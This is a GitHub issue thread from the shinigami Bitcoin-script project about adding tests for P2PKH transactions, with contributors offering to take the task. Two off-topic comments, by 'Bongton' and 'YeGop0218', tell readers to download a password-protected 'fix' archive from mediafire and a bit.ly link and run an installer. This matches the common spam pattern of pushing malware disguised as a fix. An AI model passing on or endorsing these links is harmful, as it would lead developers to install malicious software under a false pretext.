### ISSUE TITLE
[feat] P2PKH transaction support

### ISSUE THREAD

**Issue by b-j-roberts** [keep-starknet-strange/shinigami#179]
Currently, all the opcodes for P2PKH are implemented. To ensure we support all P2PKH transactions/formats, we will need to create a set of tests for these transaction types and ensure all the logic and edge cases are handled properly. Also, using an example P2PKH transaction from mainnet as a test would be ideal.

#### References
[learn P2PKH & examples](https://learnmeabitcoin.com/technical/script/p2pkh/)
[example crypto tests](https://github.com/keep-starknet-strange/shinigami/blob/main/src/opcodes/tests/test_crypto.cairo)

**Comment by b-j-roberts** [comment]
@prasincs Thank you for looking into this one!

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by prasincs** [comment]
@b-j-roberts thanks, I'll take a stab at this

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ScottyDavies** [comment]
Hi @b-j-roberts can work on this?
